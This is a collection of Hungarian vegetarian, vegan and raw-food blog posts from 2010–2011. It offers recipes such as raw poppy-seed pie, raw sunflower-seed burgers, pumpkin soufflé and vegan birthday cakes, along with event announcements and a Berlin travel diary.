Ilyenkor télen minden nap kellene fogyasztani valamilyen formában mákot. Nem sokat, de a mák már kis mennyiségben is hozzájárul a csontjaink épségéhez. (azt tudjátok ugye, hogy a mák az egyik legkiválóbb természetes kalcium forrás? ) Puha mákréteg a ropogós energiaszeleten Most itt az ideje a mákos bejgli és más mákos finomságok készítésének és fogyasztásának. Itt egy hihetetlenül egyszerű, ugyanakkor tömör és finom mákos édesség! Mákos pite hozzávalók: 20x40 cm-es energia szelet 20 dkg darált mák 4 darab szép nagy datolya (ha nem puha, akkor be kell áztatni) 1 kanál méz 1/2 citrom reszelt héja pár csepp citromlé Az energia szeletet el lehet készíteni korábban, kicsit tovább kell aszalni, hogy jó ropogós legyen. A datolyát kevés vízzel simára turmixoljuk. A mákból, és a többi hozzávalóból egy tömör tölteléket készítünk, és rásimítjuk az alapra. Ez igazából akkor gyors édesség, ha az alapunk már készen van. (készen van pillanatok alatt, és ha nem vigyázunk, el is fogy pillanatok alatt) A tetejére pár szem goji berry-t tettem, a fotózás után jól belenyomkodtam!
A legfinomabb fasírt nyersen
2011. december 9. Gitta nyersétel blogja
Salátával, főzelékkel, vagy csak úgy magában is finom. Viktoria Boutenko A nyerskonyha legjobb receptjei című könyvében található ez a nagyszerű fasírt, (Élő kerti burger) amit bárki el tud otthon is készíteni, főleg most, csak rá kell tenni néhány órára a radiátorra, vagy kályhára, és kiszárad annyira, amennyire kell. Nem kell teljesen megaszalni, akkor jó, ha kívül kicsit már száraz, de belül még puha. És így van még egy előnye: meleget tudunk enni! Hozzávalók: 2 csésze napraforgó mag 3 sárgarépa 1 közepes vöröshagyma 1/4 csésze mazsola 2 evőkanál agavé szirup 1/4 csésze oliva olaj 1 citrom 1/4 csokor friss fűszernyövény 1 teáskanál tengeri só 1 csípős paprika A hozzávalókat aprítógépben morzsásra aprítjuk, majd kézzel jól összedolgozzuk. Gombócokat formázunk a masszából, és aszalógépben (vagy sütőben, vagy kályha tetején) 1-2 órát aszaljuk. Ez egy fasírt alap. Őszintén megmondom, legtöbbször én kihagyom belőle az édes hozzávalókat, mint pl. a mazsolát, és inkább aszalt paradicsomot vagy reszelt káposztát teszek bele, így kap valamilyen plusz ízt, amitől igazán különleges és változatos tud lenni. A napraforgó mag helyett pedig sokkal finomabb dióval, paradióval vagy mandulával. Ezt is lehet tetszőlegesen váltogatni, így mindig kapsz valamilyen más ízvilágot.
Vöröslencse saláta
Ilyenkor augusztusban a paradicsomos ételek előtérbe kerülnek - legalábbis nálam :-) - , hiszen ekkor kaphatóak a piacokon a legédesebb, leglédúsabb példányok. Egyszerűen imádom és nem tudok betelni vele, mert érzem, hogy valóban a nap érlelte őket. Hozzávalók: 1 bögre vöröslencse 100 g tofu 10-12 koktélparadicsom olívaolaj ecet só, bors, bazsalikom 1. A vöröslencsét áztatás nélkül kb. 10-15 perc alatt megfőzzük. Ha készen van, hagyjuk jól kihűlni. 2. A koktélparadicsomokat negyedeljük fel és adjuk a vöröslencséhez. Ugyanígy mehet a salátához a tofu is. (Én most füstöltet használtam) 3. Készítsünk öntetet olívaolajból, ecetből és a fűszerekből. Az öntet hozzáadása után jól keverjük össze a salátát és legalább 1 órán át pihentessük hűtőben, hogy összeérjenek az ízek. Ildi :-) 2010. augusztus
JAPÁN VACSORA ÉS EGY TÉLI SALÁTA
Japán iránt érzett szerelmemet most anyagba sűrítjük Ágival. Íme a menü: Hokkaido tök saláta édes miso öntettel, feketeszezám krékerrel Ochazuke -Shiraore tea mandula-rizzsel, hagyományos kiegészítőkkel Makisushi marinált shitake gombával, marinált gyömbér, wasabi, tamari szójaszósz Yuzu mochi, fehércsokoládé gyümölcskoktéllal Petit fours Ropogtatnivalók japán ízekkel Ez a vacsora kicsit más lesz, mint a már megszokottak. Ezúttal ugyanis Keksz Ricsi az 1000 Tea teaház vezetője, teamestere is velünk tart, és a menüsorhoz illő teákat mutat be, illetve kóstoltat az est során. A japán zöld teák szerintem minden társukat felülmúlják. Ismert élettani hatásaikon kívül kellemes, szinte meditatív állapotot teremtenek bennünk, kiélezik érzékeinket, elménket így segítve elő a menü igazi élvezetét. Az ételek nem a hagyományosan megszokott japán fogások lesznek. Hagyomány, ízek, emlékek, intuíció és a nyers konyha találkozása. A vacsora időpontja 2011. november 24-e csütörtök 18 óra. Jelentkezni emailben, vagy a következő oldalon keresztül tudsz: http://elogourmet.blogspot.com/ Facebook: http://www.facebook.com/EletKonyha.LifeKitchen Egy téli sali recept (mert receptekkel már nagyon el vagyok maradva): mennyiségek nélkül- fejes káposzta- vékony csíkokra vágva radicchio spenót, fodros kel zöld fűszer tetszés szerint (én kaprot használtam, de szerintem a petrezselyem is nagyon jó lenne ehhez) aszalt meggy áztatott tökmag frissen reszelt torma friss, szűretlen extraszűz olívaolaj (innen ) citromlé és hús vékony csíkokra vágott birsalma fűstölt só kevés kömény- és fekete mustármag Néhány krékerrel isteni vasárnapi estebéd. De persze remek szereplője lehet egy hétköznapi ebéddoboznak is. (elnézést a sali kép miatt, de még mindig nincs fényképezőm, így marad a mobil -mrgoldás :( )
házi chips
2011. november 9. A malac nem ebéd
szégyen, nem szégyen, de borzasztóan szeretek nassolni és minél sósabb, annál jobb. persze oké, boltit inkább ne; nem csak a különböző adalékanyagok miatt, hanem a gyártás során használt energia, víz és a keletkező káros anyagok illetve szemét miatt sem. azonban a ha házilag előállítod, a legkirályabb dolgok egyike és még finomabb is.
hozzávalók:
- négy-öt közepes krumpli
- fűszerek: só, két ágacska rozmaring, cayenne bors
a krumplikat meghámozom, megmosom, zöldséggyalun legyalulom 1-2 mm vastag szeletekre.
egy gáztepsibe sütőpapírt rakok, majd eloszlatom rajta a krumpliszeleteket. a legjobb, ha nem fedik egymást, de mint ahogy nálam is látható, kicsit több lett, mint amennyi kényelmesen elférne egy tepsin, de kis átfedésekkel sincs még gond.
jól megszórom sóval, apróra vágott rozmaringgal és cayenne borssal. itt van az a mozdulat, amikor meg rá lehet löttyinteni pár csepp napraforgó vagy olíva olajat. nálam nem azért nincs ez, mert féltem magam a zsíroktól, hanem mert most egyszerűen kifelejtettem. a tanulság: olaj nélkül és tökéletes lesz.
előmelegített sütőben 200 °C-on kb 10 percig sütöm, majd még öt percig grillezem 250-en. az idő változhat persze, figyelni kell, hólyagos-e már, átsültek-e, odaégtek-e meg minden egyéb.
sütőtökfelfújt & a főzés filozófiája
2011. október 31. Vegasztrománia
mostanában sincs elég időm rendszeresen főzni. viszont ha főzök, akkor annak megadom a módját. most már szinte közhelynek számít, hogy lélek nélkül nem lesz jó az étel. ha hiányzik a jelenlét, nincs meg a csatorna, amin keresztül belefőzhetem magam. és minél tudatosabban veszek részt a folyamatokban, annál jobb lesz a végeredmény. tegnap összes lelkemmel és tudatosságommal kezdtem hozzá a sütőtökfelfújt készítéséhez, és ezerszer jobban élveztem a folyamatokat. ez sem mai ötlet, ráadásul nem az enyém, de nagyon ütős fogás. ráadásul két verziója is van, lehet sós is, édes is. még mindig izgatottan várom, hogy felemelkednek-e, ilyenkor vannak nehéz pillanatok is, de mindenképpen megéri rászánni az időt és az idegrendszert. sütőtökfelfújt hozzávalók: (9 db 9 cm átmérőjű tálkához) 500 g meghámozott, magjaitól megszabadított sütőtök felkockázva 2 ek vaj 2 ek olívaolaj 3 púpos ek liszt 250 ml tej 50 g reszelt cheddar (nekem most nem volt itthon, de legközelebb rakok bele kéksajtot) 3 tojás szétvélasztva só frissen őrölt fehér bors frissen őrölt szerecsendió kis darabka gyömbér a sütőt előmelegítettem 180°C-ra (4-es fokozat). a sütőtököt 10-15 perc alatt puhára pároltam (tésztafőző edényben, de egy lábas + szűrő + fedő is jó megoldás). ezután megcsináltam a besamel-mártást: a vajat és az olívaolajat egy lábosban melegíteni kezdtem, majd miután a vaj felolvadt, rászórtam a lisztet, és kézi habverővel folyamatosan keverve pirítottam 3-4 percig. aztán szép fokozatosan elkezdtem adagolni a tejet, és folyamatos keverés mellett, kis lángon főztem 5-7 percig, amíg teljesen be nem sűrűsödött. hozzákevertem a sajtot, sóztam, borsoztam, szerecsendióval fűszereztem és reszeltem hozzá egy kis gyömbért. hozzákevertem a 3 tojássárgáját és a villával összetört tököt, majd félretettem (ilyenkor érdemes ellenőrizni a fűszerezést). a fehérjét egy tálban kemény habbá vertem (jelenleg kézzel, mert elromlott a habverőm), majd óvatosan hozzákevertem a tojásos-tökös besamelhez. próbáljunk meg tényleg vigyázva dolgozni, hogy a lehető legkevésbé törjük össze a habot. ezt a masszát kis tálkákba kanalaztam (hagytam kb 1 ujjnyi távolságot a tetejüktől), majd a sütőben kb 25-30 perc alatt megsütöttem, amíg fel nem emelkednek és szép aranybarna nem lesz a tetejük. szigorúan ne nyitogassuk a sütőajtót! zsályás pestóval és grillezett kelbimbóval képzelem. (ehhez képest összetépkedett zsályalevelekkel és egy nagy adag salátával ettem. de így is finom volt..) figyelem! ha bármilyen összefüggést veszel észre a képen látható tök és a receptben szereplő tök között, az csak a véletlen műve. közük egymáshoz maximum annyi, hogy mindkettőt ugyanazon az asztalon fotóztam. és az is a véletlen műve, hogy éppen ma jár le az e havi vkf forduló, aminek témája vegetáriánus sütőtökös ételek, amit ugyan elfelejtettem, de az utolsó pillanatban eszembe jutott. (a szakácsok könyve sajtfelfújt receptjét vettem alapul és alakítottam át) Megosztás
Duna TV 2011.10.19
2011. október 19. Főzés nélkül finoman!
Kedves Barátaim :) Fogadjátok szeretettel a következő egyszerű menüsort, amely a vegán-vegetáriánus étkezési formának a népszerűsítését szolgálja, és aminek az elkészítésére a Duna Televízióban volt lehetőségem. A műsort, és az elkészítési fortélyokat a következő linken tudjátok megnézni: Műsoridő: 09:00 / 32:00 / 47:45 http://www.dunatv.hu/musor/videotar?cid=4284 Ha nem indul el, akkor Videótár - Család Barát - 2011.10.19 műsor :) Receptek: Sütőtökpástétom: (4 személyre) 25 dkg sütőtök 25 dkg TV paprika, vagy pritamin (ha ízeiben színesíteni akarjuk a pástétomot) 10 dkg mandula 1 db vöröshagyma (közepes méretű) 2 dl hidegen sajtolt olívaolaj 1 gyökérszár zöldje (petrezselyem) kevés só (ajánlott Himalája vagy tengeri só) Az alapanyagokat tisztálkodás után aprítjuk, majd egy erősebb darálóban, turmixban pépesítjük. Az elkészült pástétomot pirított tönköly vagy három magvas kenyérrel, vagy durumtésztára feltétként fogyaszthatjuk. J Zöldsaláta sütőtökcsíkokkal: (4 személyre) 1 fej fodros saláta 1 db kígyóuborka 1 doboz vegyescsíra (10 dkg) 10 dkg sütőtök 1 dl hidegen sajtolt olívaolaj 1 evőkanál lenmag Borsikafű, kevés só (ajánlott Himalája vagy tengeri só) Az alapanyagokat megtisztítjuk, majd tetszés szerinti méretre vágjuk. A sütőtökből hámozó késsel vékony csíkokat szelünk, majd lágyan az egészet az olajjal, borsíkafűvel összeforgatjuk, a szezámmaggal megszórjuk. Önálló ételként vagy köretként fogyaszthatjuk. J Körte-süti gyorsan: (4 személyre) 1/2 db vilmoskörte 25 dkg diákcsemege 1-2 evőkanál kókuszreszelék A magházától megtisztított körtét a diákcsemegével együtt egy erős aprítón grízes állagúra daráljuk, majd a masszából nedves kézzel kisgolyókat formázunk és belegörgetjük a kókuszreszelékbe. Egy kellemesen forró teához kiváló édesség. J Szeretettel: Javed www.fozesnelkulfinoman.blogspot.com +36/20-576-2082 Vállalom háznál, ,,főző tanfolyamok megtartását, tanfolyamok, baráti társaságok vegán-vegetáriánus ételekkel történő ellátását.
Hercegnő torta, vagy Hello Kitty torta II. (tej- és tojásmentes), és a 3. szülinap
2011. szeptember 18. Vegagyerek
Hála a jó égnek, bármennyire is stabilan tartotta magát, lassan a hercegnők elkezdték lenyomni Hello Kittyt a dobogó tetejéről...:-)) (na jó, önmagában Hello Kitty is aranyos, csak kicsit túl sok volt belőle az elmúlt 1 évben:-). Noha már egy éve, a második szülinap óta azt hallgattuk, hogy majd amikor megyek óvodába, Hello Kittyt tortát viszek!, idén egy spanyolcsavarral bekerültek a képbe a balerinák, hercegnők.:-) Na, Kittyke azért nem tűnt el teljesen, a végső megállapodás az volt, hogy az itthoni buliba készüljön hercegnős, az óvodaiba pedig mégis csak Hello Kitty.:-)) Az elmúlt évek egyik legfőbb tapasztalata nálunk az volt, hogy az ünnepelt gyerek a legtöbbször a formát, és a díszítést pontozza, magát a tortát nem túl sűrűn eszi...:-) Illetve a marcipánt ezerrel! A Kicsinél nálunk is nagy marcipán-imádat van mostanság - meg ha már édes, akkor azt én is jobban el bírom viselni, mint a fondantot-, úgyhogy a borítás adta magát. Belül a szokásos piskótát sütöttem meg, most annyi csavarral, hogy Mónika ötlete alapján kombináltam a kakaós és a sima piskótát. Utóbbit vendégeknek idén már leginkább 100% fehér bio liszttel sütöm, mert így érdekes módon mindig elfogy (...), a csokisnál szoktam csalni.:-) A töltelék eperlekvár, csokis és vaníliás puding volt. És a vendégek szerint nagyon finomra sikeredett (el is fogyott), a gyerekek közepes lelkesedéssel fogyasztották.:-) A díszítés leginkább úgy alakult ki, hogy kevés lett a borításra szánt marcipán, elkezdtem toldozni-foltozni, ami elég csúnya lett, így feltettem rá a szalagot. Aztán felül repedezni kezdett a marcipán, oda kerültek a takarásra szánt virágok, cukorgyönggyel a közepén.:-)) A hercegnők közül a hátsó kettő műanyag figura, az első marcipán. A Hello Kitty torta is a tavalyi kókuszos krém után most marcipános borítást kapott, belül az egyszerűség kedvéért ugyanúgy csokis (karobos) és sima piskóta, a töltelék eperlekvár, csokis és vaníliás puding. Csokis-vaníliás Hercegnő, vagy Hello Kitty torta Hozzávalók (egy 28 cm-es tortához): Sima piskóta 250 ml növényi tej (nálam most rizstej) 100 g barna cukor 1/2 citrom leve és héja 1 teáskanál vaníliakivonat250 g bio fehér liszt (vagy fele sima, fele teljes kiőrlésű, vagy 100% teljes kiőrlésű) 1 cs. foszfátmentes borkő sütőpor 1 mk. szódabikarbóna 6 ek. olaj Csokis piskóta 250 ml növényi tej (nálam most rizstej) 100 g barna cukor 1/2 citrom leve és héja 1 teáskanál vaníliakivonat250 g bio fehér liszt (vagy fele sima, fele teljes kiőrlésű, vagy 100% teljes kiőrlésű) + 2 ek. karobpor/ vagy kakaópor 1 cs. foszfátmentes borkő sütőpor 1 mk. szódabikarbóna 6 ek. olaj Vaníliás puding és Csokis puding 1-1 cs. bio pudingpor (vaníliás és csokis) 2-5 ek. nádcukor adagonként 400-400 ml növényi tej (pl. zabtej) Bio eperlekvár Marcipán a borításhoz (kb. 200 g/ torta)/ a rózsaszín marcipánt céklakivonattal színeztem A tésztához összekeverjük a tejet, a cukrot, a vaníliakivonatot, a citromlevet és az olajat, egy másik tálban pedig a lisztet, a sütőport és a szódabikarbónát, majd mind a kettő keveréket vegyítjük egymással. Kókuszzsírral bélelt tepsibe öntjük, és 200 fokra előmelegített sütőben kb. 25 percig sütjük. A krémhez felfőzzük a tejben a cukorral elkevert pudingport, külön a csokist és a vaníliást. A torták összeállítása: Hercegnős - félbe vágjuk mindkét tortalapot. A rétegezés: csokis lap - vaníliás puding - sima piskóta - csokis puding (itt a puding alá kentem lekvárt is) - csokis piskóta - van. puding - a tetejére sima piskóta. Kívülről megkentem lekvárral, és a keményítőn/ vagy nádporcukron kinyújtott marcipánnal borítottam. Hello Kittys: itt csak 3 réteget raktam (csoki-sima piskóta-csoki), a töltelékeket ugyanúgy, mint fent, a formázást, díszítést a tavalyi torta alapján. Pici lekvárral ragasztottam fel az áfonyát és a mazsolát a marcipánra.
Szedertorta
2011. szeptember 14. Cukor, bors, só
Piskóta: 4 tojás (vagy 3 tojás, 1 kanál víz) 10 deka nádcukor / méz 20 dkg darált dió pici só vanília Tojások fehérjét a cukorral kemény habbá verem, beleengedem egyenként a tojások sárgáját és/vagy a vizet, majd a diót, vaníliát és sót. Összekavarom, mehet a sütőbe (olajozott, lisztezett tortaformában (23 cm átmérő, vagy sütőpapírral bélelt formában). Krém: 25 dkg Mascarpone 3 kanál cukor 1 doboz tejszín habnak kb 45-50 dkg szeder Tejszínt a cukorral habbá verem, beleteszem a mascarponet és az előzően botmixerrel összetört szedret, tovább keverem, míg jól összeáll. Amíg hűl a piskóta, hűtőbe teszem. Majd elvágom a piskótát, picit meglocsolom rumos vízzel, jól megtöltöm a szederkrémmel, ráteszem a másik felét, tetejét is jól megkenem a krémmel, szederrel diszítem. Nyammm!!!! Nem túl édes, de finom!
Rakott burgonya "füstölt szalonnával"
2011. augusztus 23. A vegán szépség
Ez az étel tökéletes kombinációja a hagyományos magyaros ízeknek, és a vegán konyha friss találékonyságának. Könnyen és gyorsan elkészíthető. Jó étvágyat! :)
Hozzávalók:
-1 kg burgonya
-1 db közepes padlizsán
-1 doboz zabtejszín(Oatly)
-2.5 dl házi kókusztej
-himalaya só, bors, füstölt édes-nemes paprika, tárkony, bazsalikom, szárított petrezselyem, bors
-olíva olaj
-5-6 gerezd fokhagyma
-biomargarin
sült zöldséges kuszkusz
2011. augusztus 11. A malac nem ebéd
na ez is olyan, hogy alig kell valamit csinálnod és már kész is van. lehet közben borozni!
hozzávalók két személynek:
- egy édeskömény gumó
- egy fej édes hagyma
- egy nagyobb sárgarépa
- olívaolaj
- egy bögre kuszkusz
- kb másfél bögre víz
- fűszerek: só, bors, pár ágacska friss rozmaring
a zöldségeket megmosom, megpucolom, nagyobb darabokra vágom. egy tepsibe pakolom őket, majd sózom-borsozom, meglocsolom olívaolajjal. a rozmaring-ágyacskákat csak hanyagul rádobálom. 200 fokon sütöm kb 20-25 percig.
a kuszkuszt pedig a forrásban lévő, sós vízhez öntöm, elkeverem, lefedem, elzárom a gázt és várok. 5 perc múlva már fogyasztható is.
BERLIN
Megkezdtük idei kalandtúránkat. Az útvonal Németországon át Svédország, Dánia, Hollandia, Anglia, Skócia. A vissza útról még nem döntöttünk. Egy VW transporterrel vágtunk neki a nyaralásnak, amibe Adrián ágyat csináltatott, felpakoltunk forrásvízzel, nyers krékerekkel, aszalt lapokkal, házi gyümölcsös müzliszelettel. Az az elképzelésünk, hogy amerre járunk, lehetőleg végig próbálgatjuk a nyers éttermeket, lehetőségeket, amellett persze, hogy mindenhol szétnézünk egy picit, magunkba szívjuk az északi tájak levegőjét, kultúráját, bepillantunk az emberek mindennapjaiba. Berta kutya is velünk tart, neki is külön kis hely jut az autóban. Aszalt kakaós keksz, szezámos és paprikás kréker, fűszeres, csíráztatott szotyi és tökmag... Mondjuk tortillák tamaris-algás-szezámos és paradicsomos-bazsalikomos Múlt csütörtökön indultunk. Mivel előző éjszaka nem aludtunk, ezért kicsit lassan érkeztünk célba: az első éjszakát Spreewaldban, egy lübbeni kempingben töltöttük. Ez egy csodálatos természeti adottságokkal rendelkező, kis csatornákkal felszabdat vidék, ami egyéb mezőgazdasági termékein kívül uborkájáról a leghíresebb. Előszeretettel választják a kempingező németek. Már itt szembesültünk azzal, hogy Bertának jó sora lesz az úton, mert itt bizony nagyobb becsben van a kutya mint otthon, bárhová beengednek vele, külön, a kutya ellátását szolgáló felszereltséggel rendelkeznek a kempingek. És mindenki örömmel fogadja őket. Berlinbe tovább is indultunk másnap délelőtt. Egy kis reggeli futás erejéig élvezhettük Bertával a táj szépségeit, aztán eleredt az eső. Ebédre értünk Berlin első és ezidáig egyetlen 100%-ig nyers éttermébe. Egy gyógyközpontban nyitott meg nem régiben a Gesund Und Sündig elnevezésű étterem. Olyan jó volt étteremben nyers ételt enni, és most szokásunktól eltérően egy helyett mindjárt két fogást is rendeltünk. Pizzát, (a tésztája hajdinából napraforgómagból és fűszerekből állt, rajta aszalt paradicsomos krém, zöldségek és kesu-sajt) Zöldséges tekercset curry szósszal és isteni salátával (amin volt fűszeres földimogyoró, pácolt gomba és egy isteni szósz) Répatorta, amit az egyik szakács fiú szerint Béke tortának kéne hívniuk, mert olyan hatást gyakorol az emberekre ( tényleg finom volt), és gyümölcsös máktorta. Ez kevésbé volt édes, ami nekem kifejezetten tetszett. Az ízek nagyon harmonikusak voltak, nem volt az ételekben túl sok olajos mag, inkább a zöldségek domináltak, ezért az igen csak nagy adag sem volt megterhelő. De bevallom egy fogás is elegendő lett volna, dehát a kíváncsiság most erősebb volt. Egy-egy főétel 7-9 euró volt, amelyekből féladag is kérhető volt (ezt először nem akartam észrevenni:) ), a desszertek 4 euró körüliek voltak. Eszméletlen kedves kiszolgálás volt. Főleg idősebbek járnak ide, mivel ez egy egészségügyi központ sportolási, állapotfelmérési, fizioterápiás stb lehetőséggel. Más világba csöppentünk. Szerencsénk volt, hogy az étteremig eljutottunk, mert a kocsi ott meg is adta magát. Így a zuhogó esőben víkendeztünk Berlinben de minden rosszban van valami jó: egy vega, vegán fesztiválon is voltunk a belváros közepén:) Nyers dolgok is voltak Természetesen zöld turmix AZ alap dolgok: kréker, krém, golyaók, torták Az autónkat hétfőn tudták megjavítani, így addig kicsit kalandosan töltöttük napjainkat. Ha nem esett, szitált volna hétfő délutánig (amíg ott tartózkodtunk) sokkal kelemessebb lehetett volna. A zuhanyt egy sportklubban oldottuk meg, ahol a recepciós fiú ingyen beengedett minket zuhanyozni. Ez aranyat ért a két nap alatt. Szerencsére a szervíz egy nagyon kelemes, csendes kis utcában volt, senki nem zavart minket. Balról az utca, jobbról egy fantasztikus hobby- kertsor határol. A berliniek imádják ezeket a kis kertjeiket. Akármerre megy az ember, ha van egy kis üres tér, azt mindjárt beültetik. Megnéztünk néhány nevezetességet is, de nem vittük túlzásba. A hétfő újabb étterem látogatást vont maga után, majd d-u. elindultunk Északra, Malmö felé...
Fagylalt helyett
Azt hiszem ez az a recept, amit már mindenki megcsinált legalább egyszer jobb ötlete híján. Ha a hozzávalók felhasználás előtt pár órával bekerültek a hűtőbe, akkor a végeredmény tényleg fagylalt élményhez hasonló lehet. Miután mostanság a cukor fogyasztásunkat is minimálisra csökkentettük, így nálunk a gyümölcsös édességekbe banán kerül édesítésként, ami sajnos nem helyi termék (ahogy persze a nádcukor sem volna az). A további összetevők ízlés és lehetőség szerint változhatnak, mi most ribizlit és őszibarackot használtunk fel. A gyümölcsöket összeturmixolom, majd megduplázom a mennyiséget zabtejjel. Próbáltuk már sárgadinnyével, szederrel is, minden variációval elégedettek voltunk :).
Nyári (nyers) lecsószezon
2011. július 18. Napló étkeinkről, életünkről
Mi a trükkje? - kérdezte párom, miközben eszegette a maradékot tegnap este. Nem véletlen tette fel ezt a kérdést, hiszen ízre is, állagra is hasonlít főtt változatához. Ez volt az első étel még 3 éve, aminél a fiam nem vette észre, hogy teljesen nyerset eszik. Néhány dolog, amit fontosnak tartok nyers lecsó készítésénél: - Főtt változatnál a hagyma a sütés következtében édes lesz, és így ellensúlyozza a paradicsom savasságát. Ezt az édességet többféle dologgal pótolhatjuk: aszalt gyümölcsök, méz, pritamin paprika, vagy kukoricás lecsó esetén maga a kukorica. - A paprikát, hogy puha legyen, vékonyra vágom, és megsózom. Ez adja neki a főtt állagot. - A paradicsomot nem turmixolom, mert akkor elveszti a színét, hanem nagyon apróra vágom a zöld részeket kivágva belőle, mert az mérgező, és kézzel, vagy villával még összetöröm. Tegnap a végén zöldhagymát is tettem bele, mert úgy megkívántam :) Jó étvágyat hozzá!
Sötét gyümölcsök reggelire, és egy röpke beszámoló
2011. július 13. Napló étkeinkről, életünkről
josta, meggy, fekete ribizliMa reggel, fél 6-kor kimentem a kertbe, hogy szedjek magamnak reggelit, és valahogy úgy alakult, hogy csupa sötét színű gyümölcs akadt a kezembe! Persze, lehet, hogy ez nem véletlen, hiszen pillanatnyilag ezek a kedvenceim. Ezen kívül van piros, és fehér ribizlink is, de azt majd leszedem a családnak... Ebédem a tegnapi maradék lesz, kukorica saláta, illetve zsenge tök szeletek napraforgó-körözöttel. Úgy tűnik, ezek a találkozók mindig érdekesen alakulnak, tegnap például találkoztam egy asszonnyal, akinek ikrei az én lányommal jártak egy bölcsődébe, és utcai jóslásból szerzi pénzét. Figyelemmel kísértem, amit mondott, és nagyon jól forgatta a szavait a tőlem kapott információkkal fűszerezve, de egyébként amit magától talált ki, semmi nem volt helyes! Az ételek összeállításánál most a rövid elkészítési idő játszott fontos szerepet, mert egy röpke este, és hajnal állt rendelkezésre. A mazsolát a golyókhoz, és a napraforgót a körözötthöz kellett előre beáztatnom, a többi étek rögtön készíthető volt. Most nem volt aszalvány a menüben a hőség miatt. Bár a tálalás nem szép, hiszen biciklin úgyse maradt volna meg, fiam szerint a körözött jobb volt, mint amit Apa csinált. És ez nagy dolog, mert amikor dió-körözöttet, és hajdina-kolbászt vittem nyersétel-találkozóra, párom ízesítette, ez is hozzájárult sikeréhez :-) És ez volt a menü: - kukorica saláta kápia paprikával, uborkával és néhány szem tökmaggal - napraforgó-körözött tök, uborka, és paprika szeleteken - mákos-mazsolás sárgabarack puding - mazsolás, mandulás kókuszgolyó Ezek az ételek nem tartalmaztak hozzáadott édesítőt (méz, különböző szirupok), se plusz zsiradékot, ami például a candida diétában, és a cukorbetegségnél fontos. A szállítást ebben a hőségben úgy oldottam meg, hogy a fonottkosár aljára jégakkuk kerültek, ami biztosította a hűtést. Találkozó legközelebb augusztusban, időpont még nincs, nekem hétköznap jó, ha van javaslatotok, írjatok ide: hneszilvi@freemail.hu
Töltött szőlőlevél nyersen, mákos golyó...
2011. június 30. Napló étkeinkről, életünkről
Mondhatnám, hogy a nyersétel találkozó a várakozásoknak megfelelően zajlott, hiszen a késői, és gyenge szervezésemnek köszönhetően senki nem jött el, de: találkoztam ismerősökkel, akik nem is hallottak még erről, és volt elég bátorságuk megkóstolni az ételeket! Életem egyik legnagyobb dicséretét kaptam tegnap, hogy a karfiolos-tökmagos fasírt olyan, mint az igazi! Pedig se hús nincs benne, és még meg sem sült :-) Édes töltött szőlőlevélRégóta fejemben járt már a töltött szőlőlevél gondolata, és végre itt volt a nagyszerű alkalom, hogy kipróbálhassam az elgondolásomat. Szedtem szőlőlevelet a kertben, készítettem citromléből, sóból, és egy kevés szőlőmagolajból vízzel összekeverve páclét, és beletettem a leveleket. Első alkalommal - hétfő délután - csak néhány órát pácoltam, majd édes töltelékkel tettem bele. Ekkor még kicsit savanyú volt a lé, és a levél sem volt elég puha, de másnapra az édes töltelék a savanyú levéllel összeért, és egészen jó lett. Kedden reggel a következő adagnak a páclét kevésbé savanyúra csináltam, és ebben pácoltam a következő adag szőlőlevelet. Készítettem tökmagos-karfiolos fasírtalapot, és egy részét este a levelekbe töltöttem, az adag másik feléből pedig fasírtokat formáztam, és megaszaltam. A szőlőleveleket megtöltöttem a masszával, és még némi páclevet öntöttem rá, így tovább pácolódott, és egybeért szerda délutánig. Alig bírtam letenni, annyira sikerült eltalálnom az ízlésemet... A mákos golyókhoz almát reszeltem, kinyomtam a levét (és megittam), majd összekevertem darált mákkal, beáztatott mazsolával, és egy kevés darált mandulával, mert az javítja az állagát. Fahéjjal ízesítettem, és kókuszreszelékbe forgattam. Csak a képen látható mennyiséget sikerült megmentenem a lányomtól :-) A feketeribizlit pedig frissen szedtem a kertben. Kellemesen telt az idő a szökőkútnál, ritka alkalom, hogy csak így üldögélhetek, olvasva, az embereket figyelve, miközben eszegetem az otthoni meggyet, és a töltött szőlőlevelet :-) Megpróbálok valami kisebb termet beszervezni, de ha nem jön össze, július 12-én is ott leszek!
Indiai jégkrém: kulfi
2011. június 22. Csatni és Umeboshi: Jógakonyha
Ha legutóbb volt itt a gyerkőc kedvence, akkor hadd jöjjön az enyém is. Ez pedig nem más, mint a kulfi, vaníliás ízű, kardamomos fagylalt indiából. Alapját a sűrített tej, a khoja adja, amit kétféleképpen szerezhetünk; 1./ tartós, több órán át tartó főzéssel besűrítsük a tejet. 1 liter zsíros, lehetőleg friss tejből mintegy 24 dkg sűrített tejet kapunk. Vagy 2./ kondenz, nem édesített sűrített tejjel helyettesítjük. Én is most ezt használtam. Ez alap ízvilágú recept, amit kedvünk szerint ízesíthetünk kakaóporral, kókusszal, vagy gyűmölccsel. Legismertebb talán a mangós változata.(A recept olvasható a Marmalade-on is.) Indiai jégkrém: Kulfi Hozzávalók: 2 X 175 g sűrített tej (cukrozott), 200 ml habtejszín, csipetnyi kardamom. 1./ A tejet a tejszínnel forraljuk és sűrítsük össze, keverjük bele a fűszert és hagyjuk lehűlni. 2./ Ekkor töltsük poharakba és tegyük fagyasztóba.Legalább 8-10 óra kell a mélyhűtőben neki.
Indiai kókusztejes csokipuding (vegan)
2011. május 29. Csatni és Umeboshi: Jógakonyha
Én a makrobiotikus táplálkozást abszolút rugalmasan kezelem, nem pedig, mint egy merev rendszert! Egyetértek Verbovszky Gabriella, amerikában élő makrobiotika oktatóval, hogy ha mint egészségmegőrző étrendre tekintünk erre a konyhaművészetre, - nem pedig gyógyító étrendként, ahol a szigorúság kötelező - akkor lehetünk rugalmasak, kísérletezők. Szóval olykor eltérek a hazai viszonylatoktól. Mint ennél a csokis pudingnál, ahol az alap a kókusztej, míg, ha szigorúan venném, akkor rizstejet, zabtejet, vagy mandulatejet használhatnék.Édesítésnek rizsszirup, minél nagyobb kakaótartalmú étcsoki, fűszernek őrölt kardamom, és vanília esszencia. A végeredmény krémes és isteni 5 perces desszert tej, tojás és cukor nélkül! Indiai kókusztejes csokipuding (vegan) Hozzávalók: 400 g kókusztejkonzerv, 100 g étcsokoládé, 4 evőkanál rizsszirup (vagy agave), 1 evőkanál kukoricakeményítő, 1 kiskanál őrölt kardamom, 1 kiskanál vaníliaesszencia. 1. Egy lábosba forraljuk fel a kókusztejet. Olvasszuk fel benne az étcsokoládét, adjuk hozzá a kukoricakeményítőt, a kardamomot és a vaniliát. Hagyjuk besűrűsödni és vegyük le a tűzről. 2. Turmixoljuk össze és töltsük tálkákba. 3. Tálalásig néhány órára tegyük hűtőszekrénybe.
Kerekezés és egyebek
2011. május 26. Napló étkeinkről, életünkről
